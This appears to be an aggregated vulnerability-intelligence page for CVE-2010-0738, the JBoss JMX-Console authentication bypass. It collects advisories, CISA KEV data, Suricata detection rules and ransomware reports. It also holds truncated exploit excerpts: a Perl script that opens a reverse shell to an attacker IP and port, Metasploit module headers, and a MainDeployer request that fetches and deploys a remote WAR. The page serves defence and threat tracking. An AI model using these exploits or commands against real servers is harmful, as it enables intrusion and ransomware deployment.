CVE-2010-0738
published 2010-04-28CVE-2010-0738: The JMX-Console web application in JBossAs in Red Hat JBoss Enterprise Application Platform (aka JBoss EAP or JBEAP) 4.2 before 4.2.0.CP09 and 4.3 before…
PriorityP183medium5.3CVSS 3.1
AVNACLPRNUINSUCNILAN
KEVITWEXPLOITRansomware
CISA Known Exploited Vulnerabilitydue 2022-06-15
Exploited in the wild
EPSS
79.42%
99.6th percentile
The JMX-Console web application in JBossAs in Red Hat JBoss Enterprise Application Platform (aka JBoss EAP or JBEAP) 4.2 before 4.2.0.CP09 and 4.3 before 4.3.0.CP08 performs access control only for the GET and POST methods, which allows remote attackers to send requests to this application's GET handler by using a different method.
Affected
17 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| hp | procurve_manager | — | — |
| hp | procurve_manager | — | — |
| redhat | jboss_enterprise_application_platform | <= 5.1.1 | — |
| redhat | jboss_enterprise_application_platform | — | — |
| redhat | jboss_enterprise_application_platform | — | — |
| redhat | jboss_enterprise_application_platform | — | — |
| redhat | jboss_enterprise_application_platform | — | — |
| redhat | jboss_enterprise_application_platform | — | — |
| redhat | jboss_enterprise_brms_platform | <= 5.2.0 | — |
| redhat | jboss_enterprise_portal_platform | <= 4.3.0 | — |
| redhat | jboss_enterprise_soa_platform | <= 5.1.1 | — |
| redhat | jboss_enterprise_soa_platform | — | — |
| redhat | jboss_enterprise_soa_platform | — | — |
| redhat | jboss_enterprise_soa_platform | — | — |
| redhat | jboss_enterprise_soa_platform | — | — |
| redhat | jboss_enterprise_soa_platform | — | — |
| redhat | jboss_enterprise_soa_platform | — | — |
Detection & IOCsextracted from sources · hover to see the quote
commandaction=invokeOpByName&name=jboss.system:service=MainDeployer&methodName=deploy&argType=java.lang.String&arg0=<WAR_URL>↗
- →CVE-2010-0738 is exploited by sending HTTP requests using a verb other than GET or POST (e.g., HEAD) to bypass JBoss JMX Console authentication; detect non-standard HTTP verbs targeting /jmx-console/HtmlAdaptor ↗
- →The exploit uses a HEAD (or other non-standard) HTTP verb against /jmx-console/HtmlAdaptor to bypass access controls; alert on HTTP methods other than GET/POST to this URI ↗
- →The servlets invoked by httpha-invoker perform access control only for GET and POST methods; monitor for non-GET/POST HTTP requests to JBoss invoker/console endpoints as an authentication bypass indicator ↗
- →CVE-2010-0738 was actively exploited by SamSam ransomware actors targeting unpatched JBoss servers; correlate JBoss exploitation attempts with subsequent ransomware staging activity ↗
- →The exploit deploys a WAR archive via jboss.system:service=MainDeployer; monitor for unexpected WAR deployments or HTTP requests containing 'MainDeployer' and 'deploy' parameters on JBoss servers ↗
- →Detect platform fingerprinting attempts against JBoss by monitoring requests to /jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo ↗
- ·The VERB option in the Metasploit module defaults to POST, but the CVE-2010-0738 bypass specifically requires a verb other than GET or POST (e.g., HEAD); the module logic forces HEAD when a non-GET/POST verb is configured ↗
- ·The MainDeployer-based WAR upload method requires the target JBoss server to be able to make outbound connections back to the attacker's HTTP server to fetch the WAR payload ↗
- ·CVE-2011-4085 is explicitly noted as a regression of CVE-2010-0738, meaning patching CVE-2010-0738 alone may not be sufficient if the regression is present in affected JBoss platform versions ↗
CVSS provenance
nvdv3.15.3MEDIUMCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
nvdv2.05.0MEDIUMAV:N/AC:L/Au:N/C:P/I:N/A:N
vulncheck5.3MEDIUM
cisa5.3MEDIUM
vendor_redhat5.3MEDIUM
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
GHSA
GHSA-24wp-35x7-5hx9: The servlets invoked by httpha-invoker in JBoss Enterprise Application Platform before 5
ghsa_unreviewed·2022-05-17·CVSS 5.3
CVE-2011-4085 [MEDIUM] CWE-287 GHSA-24wp-35x7-5hx9: The servlets invoked by httpha-invoker in JBoss Enterprise Application Platform before 5
The servlets invoked by httpha-invoker in JBoss Enterprise Application Platform before 5.1.2, SOA Platform before 5.2.0, BRMS Platform before 5.3.0, and Portal Platform before 4.3 CP07 perform access control only for the GET and POST methods, which allow remote attackers to bypass authentication by sending a request with a different method. NOTE: this vulnerability exists because of a CVE-2010-0738 regression.
GHSA
GHSA-mm58-72w4-25hp: HP ProCurve Manager (PCM) 3
ghsa_unreviewed·2022-05-17·CVSS 7.5
CVE-2013-4810 [HIGH] CWE-94 GHSA-mm58-72w4-25hp: HP ProCurve Manager (PCM) 3
HP ProCurve Manager (PCM) 3.20 and 4.0, PCM+ 3.20 and 4.0, Identity Driven Manager (IDM) 4.0, and Application Lifecycle Management allow remote attackers to execute arbitrary code via a marshalled object to (1) EJBInvokerServlet or (2) JMXInvokerServlet, aka ZDI-CAN-1760. NOTE: this is probably a duplicate of CVE-2007-1036, CVE-2010-0738, and/or CVE-2012-0874.
GHSA
GHSA-72pp-v9jm-c6xj: The JMX-Console web application in JBossAs in Red Hat JBoss Enterprise Application Platform (aka JBoss EAP or JBEAP) 4
ghsa_unreviewed·2022-05-02
CVE-2010-0738 [MEDIUM] CWE-749 GHSA-72pp-v9jm-c6xj: The JMX-Console web application in JBossAs in Red Hat JBoss Enterprise Application Platform (aka JBoss EAP or JBEAP) 4
The JMX-Console web application in JBossAs in Red Hat JBoss Enterprise Application Platform (aka JBoss EAP or JBEAP) 4.2 before 4.2.0.CP09 and 4.3 before 4.3.0.CP08 performs access control only for the GET and POST methods, which allows remote attackers to send requests to this application's GET handler by using a different method.
VulnCheck
Red Hat JBoss Application Server Improper Authentication
vulncheck·2011·CVSS 5.3
CVE-2011-4085 [MEDIUM] Red Hat JBoss Application Server Improper Authentication
Red Hat JBoss Application Server Improper Authentication
The servlets invoked by httpha-invoker in JBoss Enterprise Application Platform before 5.1.2, SOA Platform before 5.2.0, BRMS Platform before 5.3.0, and Portal Platform before 4.3 CP07 perform access control only for the GET and POST methods, which allow remote attackers to bypass authentication by sending a request with a different method. NOTE: this vulnerability exists because of a CVE-2010-0738 regression.
Affected: Red Hat JBoss Application Server
Required Action: Apply remediations or mitigations per vendor instructions or discontinue use of the product if remediation or mitigations are unavailable.
Exploitation References: https://www.acn.gov.it/portale/w/distribuzione-di-payload-malevoli-tramite-vulnerabilita-note
VulnCheck
Red Hat JBoss Authentication Bypass Vulnerability
vulncheck·2010·CVSS 5.3
CVE-2010-0738 [MEDIUM] CWE-264 Red Hat JBoss Authentication Bypass Vulnerability
Red Hat JBoss Authentication Bypass Vulnerability
The JMX-Console web application in JBossAs in Red Hat JBoss Enterprise Application Platform performs access control only for the GET and POST methods, which allows remote attackers to send requests to this application's GET handler by using a different method.
Affected: Red Hat JBoss
Required Action: Apply updates per vendor instructions.
Known Ransomware Campaign Use: Known
Exploitation References: https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage; https://nsarchive.gwu.edu/sites/default/files/documents/5986978/National-Security-Archive-Department-of-Justice.pdf; https://www.tenable.com/blog/samsam-ransomware-how-to-identify-and-mitigate-the-risk; https://news.sophos.com/en-us/2018/05/02/s
CISA
Red Hat JBoss Authentication Bypass Vulnerability
cisa·2022-05-25·CVSS 5.3
CVE-2010-0738 [MEDIUM] CWE-264 Red Hat JBoss Authentication Bypass Vulnerability
Vulnerability: Red Hat JBoss Authentication Bypass Vulnerability
Affected: Red Hat JBoss
The JMX-Console web application in JBossAs in Red Hat JBoss Enterprise Application Platform performs access control only for the GET and POST methods, which allows remote attackers to send requests to this application's GET handler by using a different method.
Required Action: Apply updates per vendor instructions.
Notes: https://nvd.nist.gov/vuln/detail/CVE-2010-0738
Remediation Due Date: 2022-06-15
Red Hat
Invoker servlets authentication bypass (HTTP verb tampering)
vendor_redhat·2011-11-16·CVSS 5.3
CVE-2011-4085 [MEDIUM] Invoker servlets authentication bypass (HTTP verb tampering)
Invoker servlets authentication bypass (HTTP verb tampering)
The servlets invoked by httpha-invoker in JBoss Enterprise Application Platform before 5.1.2, SOA Platform before 5.2.0, BRMS Platform before 5.3.0, and Portal Platform before 4.3 CP07 perform access control only for the GET and POST methods, which allow remote attackers to bypass authentication by sending a request with a different method. NOTE: this vulnerability exists because of a CVE-2010-0738 regression.
Red Hat
JBoss EAP jmx authentication bypass with crafted HTTP request
vendor_redhat·2010-04-26·CVSS 5.3
CVE-2010-0738 [MEDIUM] CWE-284 JBoss EAP jmx authentication bypass with crafted HTTP request
JBoss EAP jmx authentication bypass with crafted HTTP request
The JMX-Console web application in JBossAs in Red Hat JBoss Enterprise Application Platform (aka JBoss EAP or JBEAP) 4.2 before 4.2.0.CP09 and 4.3 before 4.3.0.CP08 performs access control only for the GET and POST methods, which allows remote attackers to send requests to this application's GET handler by using a different method.
Suricata
ET WEB_SERVER JBoss jmx-console Access Control Bypass Attempt
suricata·2011-12-10
CVE-2010-0738 ET WEB_SERVER JBoss jmx-console Access Control Bypass Attempt
ET WEB_SERVER JBoss jmx-console Access Control Bypass Attempt
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_SERVER JBoss jmx-console Access Control Bypass Attempt"; flow:established,to_server; http.method; content:"HEAD"; http.uri; content:"/jmx-console/HtmlAdaptor?"; nocase; content:"Runtime.getRuntime().exec("; reference:cve,2010-0738; classtype:web-application-activity; sid:2014018; rev:4; metadata:created_at 2011_12_10, cve CVE_2010_0738, signature_severity Informational, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_06;)
Suricata
ET WEB_SERVER JBoss jmx-console Probe
suricata·2011-12-10
CVE-2010-0738 ET WEB_SERVER JBoss jmx-console Probe
ET WEB_SERVER JBoss jmx-console Probe
Rule: alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET WEB_SERVER JBoss jmx-console Probe"; flow:established,to_server; http.method; content:"HEAD"; http.uri; content:"/jmx-console/HtmlAdaptor?"; nocase; reference:cve,2010-0738; classtype:web-application-activity; sid:2014017; rev:4; metadata:created_at 2011_12_10, cve CVE_2010_0738, signature_severity Informational, tag Description_Generated_By_Proofpoint_Nexus, updated_at 2024_03_06;)
Suricata
ET WEB_SPECIFIC_APPS JBoss JMX Console Beanshell Deployer .WAR File Upload and Deployment Cross Site Request Forgery Attempt
suricata·2010-07-30
CVE-2010-0738 ET WEB_SPECIFIC_APPS JBoss JMX Console Beanshell Deployer .WAR File Upload and Deployment Cross Site Request Forgery Attempt
ET WEB_SPECIFIC_APPS JBoss JMX Console Beanshell Deployer .WAR File Upload and Deployment Cross Site Request Forgery Attempt
Rule: alert tcp $EXTERNAL_NET $HTTP_PORTS -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS JBoss JMX Console Beanshell Deployer .WAR File Upload and Deployment Cross Site Request Forgery Attempt"; flow:established,to_client; content:"/HtmlAdaptor"; nocase; content:"action=invokeOpByName"; nocase; within:25; content:"DeploymentFileRepository"; nocase; within:80; content:"methodName="; nocase; within:25; content:".war"; nocase; distance:0; content:".jsp"; nocase; distance:0; reference:url,www.redteam-pentesting.de/en/publications/jboss/-bridging-the-gap-between-the-enterprise-and-you-or-whos-the-jboss-now; reference:cve,2010-0738; classtype:web-application-attack; sid:2011
Suricata
ET WEB_SPECIFIC_APPS Possible JBoss JMX Console Beanshell Deployer WAR Upload and Deployment Exploit Attempt
suricata·2010-07-30
CVE-2010-0738 ET WEB_SPECIFIC_APPS Possible JBoss JMX Console Beanshell Deployer WAR Upload and Deployment Exploit Attempt
ET WEB_SPECIFIC_APPS Possible JBoss JMX Console Beanshell Deployer WAR Upload and Deployment Exploit Attempt
Rule: alert http $EXTERNAL_NET any -> $HTTP_SERVERS any (msg:"ET WEB_SPECIFIC_APPS Possible JBoss JMX Console Beanshell Deployer WAR Upload and Deployment Exploit Attempt"; flow:established,to_server; http.uri; content:"/HtmlAdaptor"; nocase; content:"action=inspect"; nocase; content:"bean"; nocase; content:"name="; reference:url,www.redteam-pentesting.de/en/publications/jboss/-bridging-the-gap-between-the-enterprise-and-you-or-whos-the-jboss-now; reference:cve,2010-0738; classtype:web-application-attack; sid:2011696; rev:6; metadata:created_at 2010_07_30, cve CVE_2010_0738, confidence Medium, signature_severity Major, updated_at 2020_09_11;)
Exploit-DB
Hewlett-Packard (HP) UCMDB - JMX-Console Authentication Bypass
exploitdb·2015-02-03·CVSS 5.0
CVE-2014-7883 [MEDIUM] Hewlett-Packard (HP) UCMDB - JMX-Console Authentication Bypass
Hewlett-Packard (HP) UCMDB - JMX-Console Authentication Bypass
---
Mogwai Security Advisory MSA-2015-02
Title: Hewlett-Packard UCMDB - JMX-Console Authentication Bypass
CVE-ID: CVE-2014-7883
Product: Hewlett-Packard Universal CMDB (UCMDB)
Affected versions: UCMDB 10.10 (Other versions might also be affected)
Impact: high
Remote: yes
Product link: http://www8.hp.com/us/en/software-solutions/configuration-management-system-database/index.html
Reported: 14/11/2014
by: Hans-Martin Muench (Mogwai, IT-Sicherheitsberatung Muench)
Vendor's Description of the Software:
The HP Universal CMDB (UCMDB) automatically collects and manages accurate and
current business service definitions, associated infrastructure relationships and
detailed information on the assets, and is a central component in man
Exploit-DB
JBoss & JMX Console - Misconfigured Deployment Scanner
exploitdb·2011-10-03·CVSS 5.3
CVE-2010-0738 [MEDIUM] JBoss & JMX Console - Misconfigured Deployment Scanner
JBoss & JMX Console - Misconfigured Deployment Scanner
---
#!/usr/bin/perl
# Exploit Title: JBoss, JMX Console, misconfigured DeploymentScanner
# Date: Oct 3 2011
# Author: y0ug codsec.com
# Version:
# Tested on: Linux
# CVE : CVE-2010-0738
#
# POC against misconfigured JBoss JMX Console
# It use the addUrl method in DeploymentScanner module
#
# More information
# http://packetstormsecurity.org/files/download/105479/JBossWhitepaper.pdf
# http://poc-hack.blogspot.com/2011/02/how-to-hack-any-version-of-jboss.html
#
# You need to edit
# $url_cmd to match the war payload url
# $url_shell is your reverse shell url
# ( only if you want to use reverse_shell("ip", "port") )
#
# The JSP shell is not mine is available every where
# I add a -b param that build the war contener to do this you need j
Exploit-DB
JBoss Application Server 4.2 < 4.2.0.CP09 / 4.3 < 4.3.0.CP08 - Remote Command Execution
exploitdb·2011-03-04
CVE-2010-0738 JBoss Application Server 4.2 < 4.2.0.CP09 / 4.3 < 4.3.0.CP08 - Remote Command Execution
JBoss Application Server 4.2 \n";
print "example: perl daytona.pl 192.168.2.10 8080 192.168.2.2 443 lnx\n";
exit;
}
if ($#ARGV != 4) { usage; }
$host = $ARGV[0];
$port = $ARGV[1];
$myip = $ARGV[2];
$myport = $ARGV[3];
$com = $ARGV[4];
if ($com eq "lnx") {
$comspec = "/bin/sh";
}
if ($com eq "win") {
$comspec = "cmd.exe";
}
$|=1;
$jsp="
0 )
{
out.write( buffer, 0, length );
out.flush();
}
} catch( Exception e ){}
try
{
if( in != null )
in.close();
if( out != null )
out.close();
} catch( Exception e ){}
}
}
%>
";
#print $jsp;exit;
srand(time());
sub randstr
{
my $length_of_randomstring=shift;# the length of
# the random string to generate
my @chars=('a'..'z','A'..'Z','0'..'9','_');
my $random_string;
foreach (1..$length_of_randomstring)
{
# rand @chars will generate a random
# num
Exploit-DB
JBoss JMX - Console Beanshell Deployer WAR Upload and Deployment (Metasploit)
exploitdb·2011-01-10
CVE-2010-0738 JBoss JMX - Console Beanshell Deployer WAR Upload and Deployment (Metasploit)
JBoss JMX - Console Beanshell Deployer WAR Upload and Deployment (Metasploit)
---
##
# $Id: jboss_bshdeployer.rb 11533 2011-01-10 14:34:24Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 [ /(Jetty|JBoss)/ ] }
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'JBoss JMX Console Beanshell Deployer WAR upload and deployment',
'Description' => %q{
This module can be used to install a WAR file payload on JBoss servers that have
an exposed "jmx-console" application. The payload is put o
Exploit-DB
JBoss JMX - Console Deployer Upload and Execute (Metasploit)
exploitdb·2010-10-19
CVE-2007-1036 JBoss JMX - Console Deployer Upload and Execute (Metasploit)
JBoss JMX - Console Deployer Upload and Execute (Metasploit)
---
##
# $Id: jboss_maindeployer.rb 10754 2010-10-19 22:24:33Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 [ /(Jetty|JBoss)/ ] }
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'JBoss JMX Console Deployer Upload and Execute',
'Description' => %q{
This module can be used to execute a payload on JBoss servers that have
an exposed "jmx-console" applicat
Exploit-DB
JBoss - Java Class DeploymentFileRepository WAR Deployment (Metasploit)
exploitdb·2010-08-03
CVE-2010-0738 JBoss - Java Class DeploymentFileRepository WAR Deployment (Metasploit)
JBoss - Java Class DeploymentFileRepository WAR Deployment (Metasploit)
---
##
# $Id: jboss_deploymentfilerepository.rb 9950 2010-08-03 15:14:34Z jduck $
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 [ /(Jetty|JBoss)/ ] }
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'JBoss Java Class DeploymentFileRepository WAR deployment',
'Description' => %q{
This module uses the DeploymentFileRepository class in
JBoss Application Server (jbossas) to deploy a JSP file
in a minimal WAR context.
},
Metasploit
SAP URL Scanner
metasploit
SAP URL Scanner
SAP URL Scanner
This module scans for commonly found SAP Internet Communication Manager URLs and outputs return codes for the user.
Metasploit
JBoss Vulnerability Scanner
metasploit
JBoss Vulnerability Scanner
JBoss Vulnerability Scanner
This module scans a JBoss instance for a few vulnerabilities.
Metasploit
JBoss Java Class DeploymentFileRepository WAR Deployment
metasploit
JBoss Java Class DeploymentFileRepository WAR Deployment
JBoss Java Class DeploymentFileRepository WAR Deployment
This module uses the DeploymentFileRepository class in JBoss Application Server (jbossas) to deploy a JSP file which then deploys the WAR file.
Metasploit
JBoss JMX Console DeploymentFileRepository WAR Upload and Deployment
metasploit
JBoss JMX Console DeploymentFileRepository WAR Upload and Deployment
JBoss JMX Console DeploymentFileRepository WAR Upload and Deployment
This module uses the DeploymentFileRepository class in the JBoss Application Server to deploy a JSP file which then deploys an arbitrary WAR file.
Metasploit
JBoss JMX Console Beanshell Deployer WAR Upload and Deployment
metasploit
JBoss JMX Console Beanshell Deployer WAR Upload and Deployment
JBoss JMX Console Beanshell Deployer WAR Upload and Deployment
This module can be used to install a WAR file payload on JBoss servers that have an exposed "jmx-console" application. The payload is put on the server by using the jboss.system:BSHDeployer\'s createScriptDeployment() method.
Metasploit
JBoss JMX Console Deployer Upload and Execute
metasploit
JBoss JMX Console Deployer Upload and Execute
JBoss JMX Console Deployer Upload and Execute
This module can be used to execute a payload on JBoss servers that have an exposed "jmx-console" application. The payload is put on the server by using the jboss.system:MainDeployer functionality. To accomplish this, a temporary HTTP server is created to serve a WAR archive containing our payload. This method will only work if the target server allows outbound connections to us.
Metasploit
JBoss JMX Console Beanshell Deployer WAR Upload and Deployment
metasploit
JBoss JMX Console Beanshell Deployer WAR Upload and Deployment
JBoss JMX Console Beanshell Deployer WAR Upload and Deployment
This module can be used to install a WAR file payload on JBoss servers that have an exposed "jmx-console" application. The payload is put on the server by using the jboss.system:BSHDeployer's createScriptDeployment() method.
arXiv
Investigation of Advanced Persistent Threats Network-based Tactics, Techniques and Procedures
arxiv_fulltext·2025-02-12
Investigation of Advanced Persistent Threats Network-based Tactics, Techniques and Procedures
Investigation of Advanced Persistent Threats Network-based Tactics, Techniques and Procedures
Almuthanna Alageel
and
Sergio Maffeis
Department of Computing
Imperial College London
London, United Kingdom
plain
plain
## Abstract
The scarcity of data and the high complexity of Advanced Persistent Threats (APTs) attacks have created challenges in comprehending their behavior and hindered the exploration of effective detection techniques.
To create an effective APT detection strategy, it is important to examine the Tactics, Techniques, and Procedures (TTPs) that have been reported by the industry. These TTPs can be difficult to classify as either malicious or legitimate. When developing an approach for the next generation of network intrusion detection systems (NIDS), it is necessary to
Bugzilla
CVE-2011-4085 Invoker servlets authentication bypass (HTTP verb tampering)
bugzilla·2011-11-01·CVSS 5.3
CVE-2011-4085 [MEDIUM] CVE-2011-4085 Invoker servlets authentication bypass (HTTP verb tampering)
CVE-2011-4085 Invoker servlets authentication bypass (HTTP verb tampering)
By using a specially crafted HTTP request, the first layer of authentication for the invoker servlets deployed by httpha-invoker can be bypassed, as the access restrictions only apply for GET and POST. Due to the second layer of authentication provided by the security interceptor, there is no way to directly exploit this flaw. If a user misconfigured the security interceptor or inadvertently disabled it, this flaw would be exploitable.
The fix is to remove the verb-specific elements from web.xml. This issue is a regression of CVE-2010-0738.
Discussion:
This issue has been addressed in following products:
JBoss Enterprise SOA Platform 5.2.0
Via RHSA-2011:1456 https://rhn.redhat.com/errata/RHSA-2011-1456.html
-
Bugzilla
CVE-2010-0738 JBoss EAP jmx authentication bypass with crafted HTTP request
bugzilla·2010-03-16·CVSS 5.3
CVE-2010-0738 [MEDIUM] CVE-2010-0738 JBoss EAP jmx authentication bypass with crafted HTTP request
CVE-2010-0738 JBoss EAP jmx authentication bypass with crafted HTTP request
By using a specially crafted HTTP request, the authentication
of the jmx-console can be bypassed, as the access restrictions
only apply for GET and POST.
Current setting is:
HtmlAdaptor
An example security config that only allows users with the
role JBossAdmin to access the HTML JMX console web application
/*
GET
POST
JBossAdmin
and should be changed to block ALL http-methods.
Acknowledgements:
Red Hat would like to thank Stefano Di Paola and Giorgio Fedon of Minded Security for responsibly reporting this issue.
Discussion:
This issue has been addressed in following products:
JBEAP 4.2.0 for RHEL 4
Via RHSA-2010:0376 https://rhn.redhat.com/errata/RHSA-2010-0376.html
---
This issue has been addre
Fortinet
A Closer Look at Satan Ransomware’s Propagation Techniques
blogs_fortinet·2019-05-20·CVSS 5.3
[MEDIUM] A Closer Look at Satan Ransomware’s Propagation Techniques
FORTIGUARD LABS THREAT RESEARCH
A Closer Look at Satan Ransomware’s Propagation Techniques
By David Maciejak and Floser Bacurio Jr. | May 20, 2019
FortiGuard Labs Breaking Threat Research
Satan ransomware first appeared in early 2017, and since then threat actors have been constantly improving the malware to infect its victims more effectively and to maximize its profits. For instance, FortiGuard Labs has discovered a campaign which was also utilizing a cryptominer malware as an additional payload to maximize its profits from its victims.
Aside from the fact that this file-encrypting malware targets both Linux and Windows platform, it also employs numerous vulnerabilities to propagate itself through public and external networks. In fact, FortiGuard Labs has discovered a new variant t
Tenable
SamSam Ransomware: How to Identify and Mitigate the Risk
blogs_tenable·2018-03-28
SamSam Ransomware: How to Identify and Mitigate the Risk
## Cloud Exposure
Tenable Cloud Security (CNAPP) Request a demo
Tenable Cloud Vulnerability Management Request a demo
Tenable CIEM Request a demo
Secure your cloud
## Vulnerability Exposure
Tenable Vulnerability Management Try for free
Tenable Security Center Request a demo
Tenable Web App Scanning Try for free
Tenable Patch Management Request a demo
Tenable Enclave Security Request a demo
Tenable Attack Surface Management Request a demo
Tenable Nessus Try for free
## AI Exposure
Tenable AI Exposure Request a demo
## OT/IoT Exposure
Tenable OT Security Request a demo
## Identity Exposure
Tenable Identity Exposure Request a demo
## Business needs
Active Directory
AI Security Posture Management (AI-SPM)
AWS security
Azure security
Cloud Security Posture Man
Tenable
SamSam Ransomware: How to Identify and Mitigate the Risk
blogs_tenable·2018-03-28
SamSam Ransomware: How to Identify and Mitigate the Risk
Blog / Cyber Exposure Alerts
Subscribe
# SamSam Ransomware: How to Identify and Mitigate the Risk
Tenable Research
March 28, 2018
3 Min Read
SamSam ransomware, which hit the city of Atlanta's systems in late March 2018, continues to be a threat. The most recent iteration leverages brute force remote desktop protocol (RDP) as an attack vector.
#### Updated on August 22, 2018
The latest iteration of SamSam attacks primarily leverages brute force RDP via tools like NLBrute while it previously leveraged JBoss/deserialization vulnerabilities. Plugin 66173 will detect exposure of remote RDP targets (rdp_logon_screen.nbin)
Remote RDP widens your attack surface and can be an easy way for attackers to get into your network. If you must use remote RDP, Two-Factor Authentication (2FA) along w
http://marc.info/?l=bugtraq&m=132129312609324&w=2http://public.support.unisys.com/common/public/vulnerability/NVD_Detail_Rpt.aspx?ID=35http://secunia.com/advisories/39563http://securityreason.com/securityalert/8408http://securitytracker.com/id?1023918http://www.securityfocus.com/bid/39710http://www.vupen.com/english/advisories/2010/0992https://bugzilla.redhat.com/show_bug.cgi?id=574105https://exchange.xforce.ibmcloud.com/vulnerabilities/58147https://rhn.redhat.com/errata/RHSA-2010-0376.htmlhttps://rhn.redhat.com/errata/RHSA-2010-0377.htmlhttps://rhn.redhat.com/errata/RHSA-2010-0378.htmlhttps://rhn.redhat.com/errata/RHSA-2010-0379.htmlhttp://marc.info/?l=bugtraq&m=132129312609324&w=2http://public.support.unisys.com/common/public/vulnerability/NVD_Detail_Rpt.aspx?ID=35http://secunia.com/advisories/39563http://securityreason.com/securityalert/8408http://securitytracker.com/id?1023918http://www.securityfocus.com/bid/39710http://www.vupen.com/english/advisories/2010/0992https://bugzilla.redhat.com/show_bug.cgi?id=574105https://exchange.xforce.ibmcloud.com/vulnerabilities/58147https://rhn.redhat.com/errata/RHSA-2010-0376.htmlhttps://rhn.redhat.com/errata/RHSA-2010-0377.htmlhttps://rhn.redhat.com/errata/RHSA-2010-0378.htmlhttps://rhn.redhat.com/errata/RHSA-2010-0379.htmlhttps://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2010-0738
2010-04-28
Published
2022-05-25
Added to CISA KEV
Exploited in the wild